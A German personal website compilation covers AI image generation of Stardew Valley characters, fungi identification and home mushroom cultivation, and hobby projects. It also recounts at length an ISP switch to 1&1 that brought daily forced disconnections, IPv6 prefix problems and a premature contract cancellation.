Auch stehe ich total auf das pixelig-schöne Kunstwerk, das ConcernedApe mit unglaublich gutem Blick für Details geschaffen hat. Es macht Spaß, Blaubeeren zu ernten, die dabei verpixelt mit einem satten PLOPP in hohem Bogen von den Büschen hüpfen. Die niedlich dahinwackelnden Pixel-NPCs mit ihren durch Symbol-Sprechblasen ausgedrückten Gefühlen (und den Textpassagen, die für Dialoge auftauchen) fast lebendig wirken. Die wunderschön gestaltete Welt aus Feldern, Wäldern, Bergen, Minen, Abwassersystemen, Meeren und Wüsten, die zu ausgedehnten Erkundungstouren einladen (mittels Mods wird diese Welt teils unglaublich viel größer und es kommen ganze Städte und Landstricht hinzu). Und dann sind da noch die liebevoll gezeichneten, leicht verpixelten Charakterbilder, die in den Dialogen auftauchen.

Trotz meiner Freude an der Pixelgrafik packt es mich ab und zu doch und ich versuche, mir die Charaktere vorzustellen, wie sie wohl im echten Leben und nicht nur auf einem 50x50 Pixel-Fensterchen aussehen würden. Das sagt sich leicht, so ohne sonderlich ausgeprägtes bildliches Vorstellungsvermögen. Bis vor kurzem war das Ganze also eine ziemlich hohe Hürde für mich, die ich nie geschafft habe.

Auftritt Stable Diffusion

Wer mich etwas kennt wird sicher mitbekommen haben, dass ich mich in den letzten Monaten und Jahren viel mit KI-Bildgenerierung beschäftgt habe. Anfangs hauptsächlich mit den rechtlichen und technischen Aspekten (Was für Bilder sind in die Modelle eingeflossen? Besteht Urheberrecht und wie ist das, wenn die Bildinformationen in einem neuronalen Netz verwursten wurden? Was braucht man, um so ein KI-Modell zu betreiben, welche Alternativen gibt es, wie sieht es mit Datenschutz aus, etc.), doch mit der Anschaffung des neuen PCs waren die Tore für die lokale Bildgenerierung weit offen. Und 24GB Arbeitsspeicher auf der Grafikkarte sollen ja auch nicht verstauben.

Machen wir einen Sprung in die inzwischen vergangene Jetztzeit - in diesem Fall0 Anfang Juli 2024. Ich hatte gerade das 1&1-Desaster) hinter mir und ein paar Tage Urlaub genommen, um mal ein wenig abzuschalten. Also: Folker schaltet ab und den PC an. KI-Bildgenerierung mittes Stable Diffusion über ComfyUI ist mittlerweile kinderleicht und es braucht nur ein paar Minuten, um sich die aktuellen Quellen herunterzuladen, mittels Python eine virtuelle Umgebung (venv, virtual environment) zu erstellen und alle Abhängigkeiten automatisch installieren zu lassen. Dann noch die Lieblings-Checkpoints (so heißen die KI-Modelle) wie z.B. Dreamshaper XL herunterladen und es kann losgehen.

Naja, jedenfalls fast. Im Gegensatz zum stabilen, aber etwas unflexiblen stable-diffusion-webui ist Comfy erst einmal… naja, erschlagend. Die Oberfläche ist komplett modular aufgebaut und man kann wie bei analogen Synthesizern die einzelnen Elemente miteinander verknüpfen und so komplexe Abläufe definieren. Zum Glück hatte ich mich schon ein wenig damit beschäftigt und wusste grundlegend, was ich brauche und erreichen möchte. Dennoch artete es in ein stundenlanges Basteln und Finetuning aus, bis das grundlegende Framework stand.

Die restlichen Stunden verbrachte ich dann mit dem sogenannten Prompt Engineering, also dem Anpassen und Optimieren der Anfragen an das KI-Modell, um das gewünschte Ergebnis herauszukitzeln.

Einige Außenstehende mögen sich jetzt (vollkommen zu Recht) fragen, wie das denn geht, wenn man mit ADHS doch dauernd Konzentrationsschwankungen hat und von einem Thema zu anderen springt. Das ist das Kuriose an ADHS - bei vielen Tätigkeiten ist das auch genau so. Bei den allermeisten sogar. Aber es gibt ein paar wenige Dinge, bei denen wir Betroffenen stundenlang am Ball bleiben können, weil uns das Thema so fesselt. Wir nennen das Hyperfokus, manche können das nach langem Üben sogar gezielt steuern. Davon bin ich leider noch weit entfernt, denn so ein Hyperfokus sorgt unter anderem auch dafür, dass ich mich abends mit einem Thema beschäftige und vom klingelnden Wekcer daran erinnert werde, dass ich gefälligst geschlafen haben sollte und jetzt zur Arbeit muss. Die Zeit nehme ich während eines Hyperfokus nahezu gar nicht wahr, noch weniger als sonst schon.

Erste Resultate

Egal wie, ich hatte ja Urlaub und Zeit spielte nur eine untergeordnete Rolle. Als nach etlichen Stunden die ersten Bilder auf dem Bildschirm materialisierten, war ich hin und weg. So sähen die Charaktere des Spiels also in der echten Welt aus. Könnten sie jedenfalls. Oder vielleicht doch ganz anders? Das Finetuning ging weiter und nach noch ein paar Stunden hatte ich die ersten drei Charaktere Abigail, Emily und Sophia halbwegs zu meiner Zufriedenheit modelliert:

Abigail Abigail Emily Emily Sophia Sophia.

Ich werde mit der Zeit (wenn mich das Interesse nicht wieder vorzeitig verlässt wie üblich, doch Stardew Valley und KI-Bildgenerierung sind bisher immer nach ein paar Wochen wieder in den Fokus gerückt) vermutlich noch weitere Charaktere aus diesem Spiel in die hochauflösende KI-Welt holen. Und solange es keine gegenteilige Bitte seitens ConcernedApe gibt, werde ich sie hier veröffentlichen - auf KI-generierte Kunst gibt es sowieso kein Copyright, es könnte höchstens um die Rechte an den Charakteren ansich gehen. Und ich hoffe, das ist durch die Kunstfreiheit abgedeckt.

Unterabschnitte von Bewegt (WIP)

Naturwissenschaften

Es muss nicht immer Technik sein! Auch die Natur bietet spannende Themen, mit denen man sich die Zeit hervorragend vertreiben kann.

Unterabschnitte von Naturwissenschaften

Astro*

Astronomie, Astrophysik, aber bitte keine Astrologie! Wenn es um die Wissenschaft rund um das All, die Sterne und alles was “da oben” so herumfliegt geht, bin ich Feuer und Flamme. Dass wir jemals so wie es sich die Science Fiction-Autoren gemeinhin vorstellen zu den Sternen fliegen werden halte ich für ausgeschlossen, dennoch ist die Faszination für die Himmelsmechanik groß.

Weitere Inhalte folgen

Pilze

Zu sagen, dass Pilze meine große Liebe sind wäre übertrieben (sorry Mycel, aber ich bin der Informatik versprochen!), aber faszinierend sind sie allemal. Meine damaligen Pläne, ein Schleimpilz-Terrarium zu bauen, scheiterten an meinem wechselhaften Fokus auf immer wieder andere spannende Themen. Dass die Schleimpilze eigentlich gar keine Pilze sind hätte mich jedenfalls nicht davon abgehalten. Heute erfreue ich mich jedoch eher an Wanderungen im Grunewald und dem Bestimmen von Pilzen. Außerdem ist ein Limonenpilz bei mir eingezogen. Doch eins nach dem anderen…

Unterabschnitte von Pilze

Pilzbestimmung

Diverse Männlein stehen im Walde

… und viele kennt man nicht. Die üblichen Verdächtigen, ein paar Speise- und Giftpilze sind beschrieben und tauchen in den gängigen Pilzführern auf. Auch die zu suchen und zu bestimmen macht reichlich Spaß, aber was ist mit dem Rest?

Welcher Rest, fragst Du? Na, der Rest, der noch nicht bestimmt ist, der nicht in den Büchern auftaucht, der bisher unerkannt und undokumentiert in den heimischen Wäldern vor sich hinpilzt und nur darauf wartet, gefunden zu werden. Und das ist gar nicht so unwahrscheinlich: Weltweit gibt es Schätzungen zufolge zwischen zwei und vier Millionen Pilzarten, von denen heute erst ca. 120.000 (also zwischen drei und sechs Prozent) beschrieben sind. Zum Vergleich: Es gibt ca. 400.000 Pflanzenarten und wir kennen davon gut 80 Prozent. Bei den Tieren sind es schon nur noch 20 Prozent (wir kennen etwa zwei Millionen Arten). Die Schätzungen der Gesamzzahl der Arten variiert je nach Quelle und Jahr der Schätzung stark, jedoch gehen die Zahlen in den meisten Fällen eher nach iben als nach unten.

Das bedeutet für Pilzbestimmer: Die Chance, eine bisher unbeschriebene Art zu finden, ist agr nicht so gering. Die meisten der unbeschrieben Pilze werden zwar nicht mit Stamm und Hut aus dem Waldboden oder auf Totholz sprießen, aber rein statistisch gesehen werden eben doch einige auch dieser gut sichtbaren Gruppe angehören. Und solch ein Exemplar zu finden und zu dokumentieren ist schon ein toller Gedanke.

Schleimpilze

Ich würde an dieser Stelle gerne einfach behaupten, dass ich mich schon immer für Pilze begeistert habe. Ich bin am und im Wald aufgewachsen und die Männlein im Walde haben mich damit quasi meine gesamte Kindheit über begleitet. Aber ich müsste dafür lügen, tatsächlich bin ich erst vor einigen Jahren durch eine Dokumentation auf einem der Öffentlich-Rechtlichen Kanälen auf Pilze, speziell Schleimpilze aufmerksam geworden. Da kommt dann doch noch der Backlink zur Kindheit: Ich bin mir sicher, dass ich den einen oder anderen Schleimpilz als Kind entdeckt und als “Ekelschleim” abgestempelt habe.

Lebewesen, die als Einzeller mehrere Quadratmeter an Oberfläche haben können, sind ansich schon etwas, das ich mir kaum erklären oder vorstellen konnte. Dann sind sie auch noch uralt (tatsächlich älter als die wohl bekanntesten noch lebenden Fossilien, die Pfeilschwanzkrebse) und können Erinnerungen abspeichern - ganz ohne Gehirn. Superspannend!

Pilzzucht

Pilze im Wald zu suchen ist gleichzeitig spannend und entspannend. Man verbindet den gemütlichen Spaziergang im Wald mit dem Sammeln von Speisepilzen, um abends eine leckere Mahlzeit damit zu kochen. Doch bei aller Entspannung muss man auch mit allen Sinnen bei der Sache sein und sein Wissen und den Pilzführer griffbereit haben, denn giftige Doppelgänger von ungiftigen Speisepilzen gibt es reichlich. Es braucht bei vielen Exemplaren schon ein gutes Maß an Wissen und Erfahrung, um sicher ausschließen zu können, dass man den falschen Pilz mit nach Hause nimmt und im Zweifel sich udn andere gefährdet.

Wer sichergehen möchte, züchtet selber. Das hört sich für manchen seltsam an, denn man kennt es aus der Pflanzenzucht, dass diese teils aufwändig ist und man sehr viel zeit in den Anbau stecken muss. Was nicht direkt im Garten wächst (wenn man dann einen hat) braucht ein Gewächshaus, man muss sich Gedanken um Dünger, Wässerung und so weiter machen.

Ich würde vermuten, dass die meisten Pilze sich gar nicht sinnvoll zu Hause kultivieren und anbauen lassen. Einige Arten reagieren sehr empfindlich auf Sonneneinstrahlung, brauchen die richtige Feuchtigkeit und Temperatur, vertragen sich nicht mit bestimmten anderen Pflanzen und Pilzen oder benötigen generell einen Lebensraum, den man selber gar nicht anständig zur Verfügung stellen könnte. Aber es gibt Ausnahmen. Und die sind teils so genügsam, dass man sie getrost im Garten oder Keller wachsen lassen kann. Manche benötigen eine hohe Luftfeuchtigkeit und müssen regelmäßig während der Wachstumsphase der Fruchtkörper (also der Teile, die man ernten und verspeisen möchte) mit Wasser besprüht werden. Bei feuchten Kellern erübrigt sich das teilweise, die Luftfeuchtigkeit reicht aus. Die angesprochenen Pilze benötigen auch einen Temperaturbereich, der in vielen Kellern fast das ganze Jahr über herrscht, ungefähr 12-20°C, mit leichten Variationen je nach Art. Pilze, die im Garten angebaut werden können, wachsen oft am besten auf einem toten Holzstamm, den man mit den Sporan “impfen” kann. Es gibt auch Methoden, Pilze mit Stroh und Kaffeesatz zu ziehen, die jedoch schon wieder mehr Pflege benötigen und ihre eigenen Herausforderungen mitbringen. Auch in einem angebohrten Eimer können Pilze gezüchtet werden. Und wer sich keinen großen Kopf machen will, weder Garten noch Keller hat und einfach ein paar Pilzen beim Wachsen zuschauen will, der kann sich fertige Pilz-Kits holen, die nur ein wenig Feuchtigkeit und einen schattigen Platz am Fenster benötigen, um 3-4 Ernten zu produzieren.

Unterabschnitte von Pilzzucht

Zuchtstation

Meine Zuchtstation besteht aus einer sogenannten “Still Air Box”, einem Luftbefeuchter und einem kombinierten Thermo- und Hygrometer.

Still Air Box

Eine Still Air Box ist eine durchsichtige Plastikbox mit Aussparungen für Luftzufuhr, Arbeiten in der Box und Gerätezuführungen. Klingt kompliziert, ist es aber nicht. Über den Onlinehandel bekommt man entsprechende Boxen vorgefertigt, alternativ kann man sie sich auch selber bauen. Meine Version habe ich der Einfachheit halber gekauft, sie bietet genug Platz für zwei Fertig-Pilzkulturen in der Box und hat zwei Öffnungen, die mit Membranen versehen sind. So lassen sich leicht Arbeiten in der Box erledigen. Der Aufbau ist auch denkbar einfach: Auseinanderfalten, Reißverschlüsse schließen, fertig. Ich nutze die Reißverschlüsse auch, um dort den Schlauch des Luftbefeuchters durchzuführen.

Die Still Air Box sorgt primär für ein konstantes und überwachtes Raumklima, um den spezifischen Anforderungen der jeweiligen Pilze gerecht zu werden.

Luftbefeuchter

Ein Luftbefeuchter ist für die Pilzzucht ohne ausreichend feuchte Räumlichkeiten die wohl wichtigste Komponente des Setups. Während einige Pilze sich auch problemlos im Garten oder im Keller züchten lassen, muss man etwas kreativer werden, wenn man beides nicht besitzt oder Pilze mit besonderen Anforderungen an ihre Umgebung züchten möchte.

Ich habe mir das Hygro System von hobby-terraristik.com besorgt, da es einen großen Wasserspeicher hat und die Benebelung mit umfangreichen zeitgesteuerten Einstellungen ermöglicht. Ich fülle es nicht mit normalem Leitungswasser aufgrund des hohen Kalkgehaltes, sondern mit stillem Trinkwasser aus der Flasche. Der Verbrauch ist nicht sonderlich hoch, mit einem Liter komme ich eine gute Woche aus. Vernebelt wird mit voller Stärke alle 2-3 Stunden für zwei Minuten, was für eine Luftfeuchtigkeit von 70% bis 80% innerhalb der Box ausreicht.

Thermo-/Hygrometer

Um sowohl die feuchtigkeit als auch die Temperatur gut im Blick zu haben, bietet es sich an, sowohl ein Hygrometer als auch ein Thermometer aus dem Terrariums-Handel in der Box zu platzieren. Welches Produkt man wählt ist hauptsächlich Geschmackssache, es sollte nur mit hoher Luftfeuchtigkeit klarkommen.

Frischluft

In einer Still Air Box kann es schnell stickig werden und auch Pilze haben gerne ein wenig frische Luft. Mit einer permanenten Frischluftzufuhr würde ich jedoch den Vernebler dauerhaft laufen lassen müssen, außerdem würde die feuchte Luft in den Wohnraum entweichen, was bei einer schimmelanfälligen Wohnung doch eher contraproduktiv ist. Daher halte ich die Luftfeuchtigkeit den Tag über hoch, öffne dann abends die Box an einer Seite und drücke sie mehrmals zusammen, sodass die verbrauchte Luft hinaus- und frische Luft hineingesaugt wird. Währenddessen lüfte ich die Wohnung durch, damit die feuchte Luft nicht direkt an den Wänden kondensiert.

Limonenseitling

Mein erster Myko-Mitbewohner ist ein Limonenseitling, auch Limonenpilz oder Zitronengelber Seitling. Er lässt sich gut in schattigen Umgebungen mit konstanter Temperatur zwischen 16°C und 24°C und hoher Luftfeuchtigkeit züchten, wofür sich Keller mit Lichteinlässen hervorragend eignen. Leider besitze ich keinen Keller und musste daher etwas kreativer werden.

Ich habe mir online ein fertiges Pilzzucht-Set gekauft, das ich anweisungsgemäß an zwei der vier Öffnungen eingeschnitten habe. Das wanderte danach direkt in die Still Air Box, der Vernebler wurde angeschlossen und ich konnte mich nach wenigen Stunden davon überzeugen, dass die Temperatur bei ca. 20°C (Raumtemperatur) und die Luftfeuchtigkeit über 70% war. Die Box steht direkt an einem Fenster, an dem es keine direkte Sonneneinstrahlung gibt. Generell benötigen Limonenpilze nur wenig Licht, indirektes schummriges Licht reicht vollkommen aus.

Nach etwa 10 Tagen zeigten sich die ersten Anzeichen, dass Fruchtkörper ausgebildet wurden. Die eingeschnittenen Stellen wölbten sich leicht nach außen und man konnte einen Hauch von gelb erkennen. [tbd]

Bastelkram

tinkering

Ich bin nicht nur IT-begeistert, sondern bastle an den verschiedensten Fronten herum. In vielen Fällen alleine deshalb, weil das, was ich gerne hätte, nicht regulär am Markt verfügbar ist - oder weil ich keine Lust habe, ein nur leicht beschädigtes Gerät wegzuwerfen, weil der Hersteller den Support eingestellt hat.

Ich möchte an dieser Stelle einige meiner Projekte vorstellen.

Unterabschnitte von Bastelkram

CNC-Fräse (WIP)

Für Bohr- und Fräsarbeiten an Holz- oder Plastikplatten habe ich eine CNC-Fräse im handlichen Tischformat angeschafft. Angetrieben von einem Arduino lässt sie sich unter Linux problemlos ansteuern und sorgt neben vielen Spänen und Staub für reichlich Freude.

Weitere Inhalte folgen

Elektronik (WIP)

Der Großteil meiner Basteleien hat mit Elektronik in irgendeiner Form zu tun. Arduinos, Raspberry Pis, andere Kleinstcomputer und die guten alten Breadboards sind genauso meine Freunde wie der Lötkolben und die unzähligen elektronischen Bauteile.

Weitere Inhalte folgen

Laser (WIP)

Was wäre eine Bastelwerkstatt ohne einen Laser? Nachdem ich den großen CO2-Laser durch ein handlicheres Diodenlaser-Modell ersetzt habe, werden mit Vorliebe Holz & Pappe beschriftet und geschnitten.

Weitere Inhalte folgen

IT

Eines meiner großen Steckenpferde und sowohl Beruf als auch Berufung. Ich habe diverse Facetten IT aus verschiedenen Blickwinkeln kennengelernt und werde versuchen, einen Teil meiner Erkenntnisse hier wiederzugeben.

Unterabschnitte von IT

Kurioses

An dieser Stelle präsentiere ich euch Kurioses im Rahmen der IT, das ich im Kontakt mit Menschen, Dienstleistern und Geräten ansich erlebt habe. Erstere natürlich in anonymisierter Form, bei Dienstleistern kann es aber schon mal sein, dass ich sie beim Namen nenne, wenn sie es verdient haben oder eine Warnung angebracht ist.

Unterabschnitte von Kurioses

1&1 und die Zwangstrennung des Todes

Mitte 2024 hatte ich die wohl dümmste Idee der letzten Jahre: Nach mehreren zufriedenen Jahren mit der Telekom als Internetanbieter entschied ich, dass es Zeit ist, neue Wege zu beschreiten.

Vorgeschichte

Ich hatte die Jahre vor dem Wechsel lange Zeit meinen Anschluss bei 1&1, dieser machte mehrere Umzüge mit und wurde schließĺich aufgrund angeblich technisch nicht behebbarer Leitungsstabilitätsprobleme abgelöst.

Bei der Telekom setzten sich die häufigen Verbindungsabbrüche fort, wurden jedoch mit dem zweiten Technikerbesuch vor Ort schließlich durch das Abklemmen mehrerer in Reihe geschalteter TAE-Dosen behoben. Offenbar sorgte die nicht fachgerechte Verkabelung für Einkopplungen oder andere Störeinflüsse, bei den empfindlichen DSL-Protokollen, speziell mit Vectoring und hohen Datenübertragungsraten, führt das recht zuverlässig zu Beeinträchtigungen. Nach dem Trennen der überflüssigen Dosen stabilisierte sich die Verbindung und ich hatte nur sehr selten Trennungen - meist durch das von mir gesteuerte Updaten und Neustarten meines Routers.

Nun dachte ich mir, dass die Leitungsstörungen ja behoben seien, zudem bot mir 1&1 ein sehr günstiges Komplettpaket, das effektiv zum halben Preis mehr Leistung bot als der Telekom-Vertrag. Der Preis war ein treibender Faktor, jedoch nicht der einzige. im Vorfeld meiner Kündigung telefonierte ich mit dem Telekom-Vertrieb und erkundigte mich, ob mit dem optional zubuchbaren IPTV-Paket auch eine Weboberfläche zur Verfügung stünde, mit der ich auch auf einem Linux-Gerät einen bestimmten Sender schauen könne. Kurioserweise wurde dies verneint, obwohl mit der Entertain-Webseite durchaus ein solcher Service zur Verfügung steht. Das wussten zu diesem Zeitpunkt jedoch weder ich noch die Vertriebsmitarbeiterin…

Da ich neben dem finanziellen Interesse auch ein Interesse daran hatte, auf meinem Linux-Client das eine oder andere TV-Programm zu schauen (ich besitze keinen Fernseher und schaue in der Regel höchstens Dokumentationen und Nachrichtensender) und 1&1 seit kurzem ein grundlegendes IPTV-Senderangebot im Preis inbegriffen hatte, entschied ich mich wider besseren Wissens für einen Anbieterwechsel. Auf zu 1&1.

Gesagt, getan. Zum Ende des Monats war der Telekom-Anschluss gekündigt und 1&1 übernahm nahezu ohne Ausfall der Leitung. Ich konfigurierte einige Stunden an meiner Netzwerkhardware herum um sie optimal an die neue Leitung anzupassen und freute mich auf alles, was nun so kommen sollte. Und es kam - die Zwangstrennung.

Back to Leitungsstörung

Mit meinem Telekom-Anschluss waren sowohl unplanbare Leitungsstörungen als auch tägliche Zwangstrennungen ein Thema der Vergangenheit geworden. Ich hatte mich im Vorfeld des Anbieterwechsels mit dem 1&1-Vertrieb in Verbindung gesetzt und mir bestätigen lassen, dass keine Zwangstrennung stattfindet. Boy, were they wrong! Um 20 vor vier Uhr morgens brach die Internetverbindung zusammen und wurde erst Minuten später wiederhergestellt. Ich prüfte meine Hardware und die Logdateien und sah den Verbindungsabbruch - Paketverlust auf der Leitung. Zu diesem Zeitpunkt hatte ich als Modem ein Draytek Vigor 165 im Einsatz und dahinter meine Unifi-Infrastruktur mit der Dream Machine Pro als Firewall, die sich ins Internet einwählte. Keines dieser Geräte führt eine automatische Trennung der Internetverbindung durch, es gibt nicht einmal eine Option dafür.

Dennoch wollte ich ausschließen, dass der Fehler auf meiner Seite lag. Nach einem kurzen Gespräch mit dem 1st Level des 1&1-Supports, der mir versicherte, es gebe keine Zwangstrennung, und wenn, dann könne es ein Techniker abstellen, ließ ich mich mit der entsprechenden Abteilung verbinden. Hier versicherte man mir (im Gegensatz zur ersten Aussage), dass es sehr wohl eine Zwangstrennung gebe, diese könne man auch nicht deaktivieren, denn diese werde von der Telekom vorgeschrieben, deren Leitung man benutze. Spannende Aussage, ich habe mir den klärenden Anruf bei der Telekom jedenfalls erspart. Um wirklich auszuschließen, dass keins meiner Geräte das Problem ist, schloss ich eine Fritzbox 7590 an, konfigurierte diese für den normalen Routerbetrieb und ließ sie die Einwahl vornehmen und das Internet an die nachgelagerte UDM Pro weiterreichen. Das Ergebnis war vorhersehbar: 24 Stunden später wurde die Verbindung wieder getrennt. Da die Fritzbox die Verbindung selbst verwaltete dauerte diese Trennung zwar nur den Bruchteil einer Sekunde, doch der IPv6-Präfix änderte sich mit der Neueinwahl dennoch.

Gut, mag nun der geneigte Leser denken, dann ändert sich ein Präfix und die Verbindung war nur Sekundenbruchteile getrennt - so what?

Das Ding mit IPv6 und offenen Ports

Das Problem hat mehrere Facetten:
Mit der Änderung des IPv6-Präfixes bekommen nach und nach alle meine intern betriebenen Geräte neue IPv6-Adressen zugewiesen. Mein Netzwerk besteht aus mehreren VLANs mit unterschiedlichen Adressbereichen, die zum einen durch Firewallregeln voneinander separiert sind und zum anderen durch die Natur dieser Netzbereichsaufteilung nicht mit lokalen IPv6-Adressen über die VLAN-Grenzen hinweg miteinander kommunizieren können. Das bedeutet zum einen, dass mit einem Wechsel des Präfix die Geräte nach und nach eine ganze Armada von IPv6-Adressen ansammeln und offenbar auch weiterhin versuchen, darüber zu kommunizieren. Das führt in der Übergangsphase zuweilen zu Kommunikationsproblemen untereinander, so dass meine internen Services nicht zuverlässig funktionieren. Zum anderen erlaubt die UDM Pro nur begrenzt, Firewallregeln für wechselnde IPv6-Adressen so zu schreiben, so dass diese auch nach dem Wechsel noch wirksam greifen. Möglicherweise habe ich dafür in der Zwischenzeit eine Lösung gefunden, aber schön ist sie nicht.

Zudem kann und möchte ich keine Fritzbox permanent im Router-Modus vor der UDM Pro betreiben, da mir dies zum eine “doppelte Buchhaltung” beschert, da ich alle Portfreigaben sowohl auf der UDM Pro als auch auf der Fritzbox schalten muss. Zum anderen betreibe ich so ein “doppeltes NAT”, da sowohl die Fritzbox ihre öffentliche IP-Adresse in eine lokale lokale (und zurück) übersetzt, als auch die UDM Pro die Adresse der Fritzbox (bereits das NAT der öffentlichen IPs) noch einmal in ihre eigenen internen Adressen umschreibt. Multicast und direkte Verbindungen per UDP sind auf diese Art eine Qual. Das Portfreigaben-Thema kann man ggf. umgehen, indem die Fritzbox die UDM Pro als “exposed Host” behandelt, also ohne filternde Firewall allen Datenverkehr direkt dorthin weiterleitet, sauber ist das allerdings nicht - und das doppelte NAT wird dadurch auch nicht behoben.

Ich war’s nicht, ehrlich!

Nun gut, noch einmal zum 1&1-Support, diesmal mit handfesten Beweisen, dass das Problem tatsächlich nicht auf meiner Seite besteht und es sich um eine Leitungstrennung seitens 1&1 handelt. Und wenn man mir schon einmal am Tag die Ehre einer automatisierten Intervention erweist, nutze ich das reichliche Serviceangebot, um dem einen Riegel vorzuschieben. Dachte ich zumindest.
Mir wurde freundlich bestätigt, dass es in der Tat eine derartige 24h-Trennung gebe, diese könne auch nicht abgeschaltet werden. Sogar für Geschäftskunden nicht. Die bisherigen Widersprüche der vorherigen Anfragen könne man sich nicht erklären, aber wenn es mir weiterhelfe könne man wenigstens bei einem Geschäftskundenanschluss eine feste IPv4-Adresse sowie einen festen IPv6-Präfix schalten, der Vertrag müsse entsprechend umgestellt werden.

Da diese Vorgehensweise wenigstens meine internen Verbindungs- und Firewallprobleme behoben hätte, war ich durchaus geneigt, das Experiment zu wagen. Mein nächster Anruf ging also zur Geschäftskundenhotline bzw. deren Vertriebsabteilung. Ihr werdet es nicht erraten: Nein, feste IP-Adressen und IPv6-Präfixe schalte man auch bei Geschäftskunden nicht, so etwas biete man generell nicht an. Man staunte baß, woher ich meine Informationen habe und riet mir nach einigem Hin und Her, dann den Vertrag vorzeitig zu kündigen, da mir offenbar falsche Informationen gegeben wurden, die mir eine falsche Vorstellung der Vertragsleistungen vermittelt haben.

Was für ein Rückschlag. Ich hatte zwar schon insgeheim mit diesem Ausgang gerechnet, hatte aber gehofft, dass sich dennoch eine halbwegs zufriedenstellende Lösung finden würde. Aber es half ja alles nichts, ein Internetanschluss mit derartigen Einschränkungen war für mich nicht zu gebrauchen. Ein kurzes Telefonat mit der Telekom später wusste ich, dass diese meinen Anschluss sehr zeitnah neu beschalten können, sobald ich die Kündigungsbestätigung seitens 1&1 erhalten habe. Also schrieb ich eine längliche Mail…

Eine längliche Kündigungsmail

Sehr geehrte Damen und Herren,

ich habe vor kurzem meinen Internetanschluss von der Telekom zu Ihnen umgezogen. Entgegen meiner Erwartungshaltung und der Aussagen Ihrer Kundenberater kommt es alle 24 Stunden zu einer Zwangstrennung der Internetverbindung, die zusätzlich zu einem Wechsel des IPv6-Präfix führt.

Ich habe mich diesbezüglich mehrfach mit Ihrem 1st Level Support, Ihrer Technik, dem Privatkundenvertrieb sowie der Geschäftskundenhotline in Verbindung gesetzt. Ich bekam unterschiedliche und sich teils widersprechende Aussagen (in chronologischer Reihenfolge, ggf. finden Sie in den Notizen in Ihrer Anrufhistorie zusätzlich interne Notizen):

- Zwangstrennung existiert nicht
- Zwangstrennung existiert, kann aber von der Technik auf Anfrage deaktiviert werden
- Zwangstrennung existiert und kann auch nicht deaktiviert werden, Geschäftskundenanschlüsse haben diese jedoch nicht
- Zwangstrennung existiert eigentlich nicht, aber eine feste IPv4-Adresse sowie ein fester IPv6-Prefix können für Geschäftskunden geschaltet werden
- Zwangstrennung existiert bei allen Tarifen, egal ob für Geschäfts- oder Privatkunden; feste IPs und Prefixe gibt es ebenfalls nicht

Ich komme wie erwähnt von einem Telekom-Anschluss, bei dem eine Zwangstrennung, wenn überhaupt vorhanden, so selten geschieht, dass ich meine Geräte aufgrund von monatlichen Wartungszyklen eher neu starte, als dass ich etwas davon mitbekomme.

Eine Zwangstrennung ist für mich aus folgenden Gründen eine inakzeptable Funktionseinschränkung:

< längliche Erklärung meiner beruflichen Anforderungen, die hier nichts verloren haben, sorry. :) >

Hinzu kommt, dass ich intern nativ IPv6 nutze, indem ich den bereitgestellten Präfix als Subnetze an meine VLANs weitergebe. Jedes Mal, wenn dieser Präfix wechselt, werden meine Geräte-IPs (IPv6, nicht IPv4) ungültig und müssen neu ausgehandelt werden. Dies führt zu internen Verbindungsproblemen zwischen VLANs, da sonst übliche lokale Adressen hier nicht geroutet werden können. Zusätzlich zu den Konnektivitätsproblemen muss ich durch die neu vergebenen IPv6-Addressräume jedes Mal die vorhandenen Firewallregeln, die die VLANs und Geräte voneinander trennen, neu schreiben (lassen). Auch das erzeugt mir im Moment der Trennung unnötig viel Aufwand. Einmal im Monat war das machbar, täglich grenzt es an Schikane.

Da mir inzwischen mehrfach versichert wurde, dass die Zwangstrennungen nach 24 Stunden gesetzlich vorgeschrieben sei (mir ist im aktuellen TKG kein entsprechender Paragraf bekannt, im Gegenteil wird durch die Zwangstrennung an All-IP-Anschlüssen auch die IP-Telefonie getrennt, womit in diesem Zeitraum kein Festnetz-Notruf mehr möglich ist, was rechtlich für Sie als Anbieter mindestens eine grenzwertige Praxis sein dürfte) und auf technischer Ebene von Ihnen nicht abgeschaltet werden kann, muss ich an dieser Stelle dem Rat Ihres Vertriebs folgen:

Ich kündige hiermit den Vertrag XXXXXXXXXX außerordentlich zum 30.06.2024, sofern sich Ihrerseits nicht binnen 10 Tagen eine technische Lösung finden lässt.

Bitte prüfen Sie diese Angelegenheit und geben Sie mir eine Rückmeldung bis spätestens 21.06.2024, ob meinem Anliegen nachgekommen werden kann. Bitte beachten Sie, dass die Kündigung zum 30.06.2024 erfolgt, um die nötige Zeit für einen erneuten Anbieterwechsel zu ermöglichen.

Mit freundlichen Grüßen

Ich erläuterte also meine Anforderungen an einen Internetanschluss und wieso der 1&1-Anschluss für mich auf diese Art nicht sinnvoll nutzbar ist, räumte 10 Tage für die Suche nach einer technischen Lösung ein und kündigte für den Fall, dass dies nicht möglich sei, den Vertrag mit Wunschtermin zum Ende des Monats, um noch genügend Zeit zu haben, einen neuen Vertrag und Schaltungstermin auszumachen. Ich wähnte mich auf der sicheren Seite und folgte mit dieser Mail auch der Empfehlung der Telekom, da eine Übernahme der Leitung durch die portierten Festnetznummern andernfalls deutlich länger gebraucht hätte - Aussage Telekom.

Überraschungskündigung!

Die Mail ging noch am späten Abend bei 1&1 ein und bereits am Nachmittag des Folgetages erhielt ich meine Kündigungsbestätigung. Man bedauere das vorzeitige Ende des Vertragsverhältnisses und hoffe, zu einem späteren Zeitpunkt vielleicht wieder zusammen zu finden. In der Mail wurde mir auch der Termin der wirksamen Kündigung (mit Abschaltung aller Services) mitgeteilt: Der 12.06.2024 - also der heutige Tag. Meine Bitte, den Vertrag erst zum Ende des Monats zu kündigen, wurde ignoriert.

Mein erster Anruf galt der Telekom. Der Kundendienstmitarbeiter, mit dem ich schon am Vorabend gesprochen hatte, handelte mit mir einen neuen Vertrag mit allen Optionen aus, die ich brauchte. Auch er war sich nicht sicher, ob es eine Web-Oberfläche für IPTV gab, nach kurzer Recherche bestätigte er aber meine Vermutung, dass diese ggf. unter web.magentatv.de zu finden sein könnte. Gut, dass ich mich diesmal selber schon informiert hatte.
Bei der Erfassung der Vertragsdaten und der automatischen Anfrage bei 1&1, wann die Leitung freigegeben sei, staunten wir nicht schlecht: Die Leitung wurde noch bis zum 21.06.2024 von 1&1 blockiert, erst danach sei eine Schaltung seitens der Telekom möglich. Für mich bedeutete das im Zweifel: Ich würde vom 13.06. bis zum 22.06. ohne Internet dastehen. Was war da wieder schiefgelaufen?

